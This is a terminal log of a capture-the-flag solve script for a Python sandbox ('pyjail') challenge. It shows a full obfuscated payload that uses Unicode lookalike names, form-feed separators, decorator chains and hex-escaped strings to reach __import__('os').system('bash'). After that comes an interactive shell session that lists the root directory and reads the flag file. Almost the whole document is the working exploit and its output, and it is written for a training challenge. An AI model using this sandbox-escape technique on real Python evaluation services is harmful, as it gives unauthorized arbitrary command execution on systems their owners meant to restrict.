D:\Document (Aldi)\Catatan-Konfig\Cybersecurity\Playground TCP1P\MISC - USELESS PYTON>python3 solve.py
[x] Opening connection to 172.188.90.64 on port 25776
[x] Opening connection to 172.188.90.64 on port 25776: Trying 172.188.90.64
[+] Opening connection to 172.188.90.64 on port 25776: Done
b'command\x0c=\x0clambda\x0cx:\x0c"\\x62\\x61\\x73\\x68"\r\xf0\x9d\x93\xb2\xf0\x9d\x93\xb6\xf0\x9d\x93\xb9\xf0\x9d\x93\xb8\xf0\x9d\x93\xbb\xf0\x9d\x93\xbd_list\x0c=\x0c[]\r\xf0\x9d\x93\xb8\xf0\x9d\x93\xbc_list\x0c=\x0c[]\rx=_\xef\xbc\xbfbuild_class_\xef\xbc\xbf=lambda\x0c*_:_\rg=x._\xef\xbc\xbf\xf0\x9d\x93\xb0\xf0\x9d\x93\xb5\xf0\x9d\x93\xb8\xf0\x9d\x93\xab\xf0\x9d\x93\xaa\xf0\x9d\x93\xb5\xf0\x9d\x93\xbc_\xef\xbc\xbf\rb=_\xef\xbc\xbf\xf0\x9d\x93\xab\xf0\x9d\x93\xbe\xf0\x9d\x93\xb2\xf0\x9d\x93\xb5\xf0\x9d\x93\xbd\xf0\x9d\x93\xb2\xf0\x9d\x93\xb7\xf0\x9d\x93\xbc_\xef\xbc\xbf\rc=_\xef\xbc\xbf\xf0\x9d\x93\xab\xf0\x9d\x93\xbe\xf0\x9d\x93\xb2\xf0\x9d\x93\xb5\xf0\x9d\x93\xbd\xf0\x9d\x93\xb2\xf0\x9d\x93\xb7\xf0\x9d\x93\xbc_\xef\xbc\xbf\rb|=g\rtype_class\x0c=\x0clambda\x0cx:\x0c[]._\xef\xbc\xbfclass_\xef\xbc\xbf._\xef\xbc\xbfclass_\xef\xbc\xbf\rget_\xf0\x9d\x93\xb2\xf0\x9d\x93\xb6\xf0\x9d\x93\xb9\xf0\x9d\x93\xb8\xf0\x9d\x93\xbb\xf0\x9d\x93\xbd\x0c=\x0clambda\x0cx:\x0cx[0].\xf0\x9d\x93\xbb\xf0\x9d\x93\xaegister._\xef\xbc\xbf\xf0\x9d\x93\xb0\xf0\x9d\x93\xb5\xf0\x9d\x93\xb8\xf0\x9d\x93\xab\xf0\x9d\x93\xaa\xf0\x9d\x93\xb5\xf0\x9d\x93\xbc_\xef\xbc\xbf["\\x5f\\x5f\\x62\\x75\\x69\\x6c\\x74\\x69\\x6e\\x73\\x5f\\x5f"]["\\x5f\\x5f\\x69\\x6d\\x70\\x6f\\x72\\x74\\x5f\\x5f"]\r\xf0\x9d\x93\xb8\xf0\x9d\x93\xbc_str\x0c=\x0clambda\x0cx:\x0c"\\x6f\\x73"\r@\xf0\x9d\x93\xb2\xf0\x9d\x93\xb6\xf0\x9d\x93\xb9\xf0\x9d\x93\xb8\xf0\x9d\x93\xbb\xf0\x9d\x93\xbd_list.append\r@get_\xf0\x9d\x93\xb2\xf0\x9d\x93\xb6\xf0\x9d\x93\xb9\xf0\x9d\x93\xb8\xf0\x9d\x93\xbb\xf0\x9d\x93\xbd\r@[]._\xef\xbc\xbfclass_\xef\xbc\xbf._\xef\xbc\xbfclass_\xef\xbc\xbf._\xef\xbc\xbf\xf0\x9d\x93\xbc\xf0\x9d\x93\xbe\xf0\x9d\x93\xabclasses_\xef\xbc\xbf\r@type_class\rclass\x0cX:...\r@\xf0\x9d\x93\xb8\xf0\x9d\x93\xbc_list.append\r@\xf0\x9d\x93\xb2\xf0\x9d\x93\xb6\xf0\x9d\x93\xb9\xf0\x9d\x93\xb8\xf0\x9d\x93\xbb\xf0\x9d\x93\xbd_list[0]\r@\xf0\x9d\x93\xb8\xf0\x9d\x93\xbc_str\rclass\x0cX:...\r@\xf0\x9d\x93\xb8\xf0\x9d\x93\xbc_list[0].\xf0\x9d\x93\xbc\xf0\x9d\x94\x82\xf0\x9d\x93\xbc\xf0\x9d\x93\xbd\xf0\x9d\x93\xae\xf0\x9d\x93\xb6\r@command\rclass\x0cX:...'
[*] Switching to interactive mode
input: hello
bash: line 1: hello: command not found
ls
run
ls /
app
bin
boot
dev
etc
flag.txt
home
lib
lib64
media
mnt
opt
proc
root
run
sbin
srv
sys
tmp
usr
var
cat /flag.txt
INTECHFEST{8c8febf8594793a146a8f035dfab380c78569ab900586cfb}
[*] Got EOF while reading in interactive
whoami
[*] Interrupted
[*] Closed connection to 172.188.90.64 port 25776
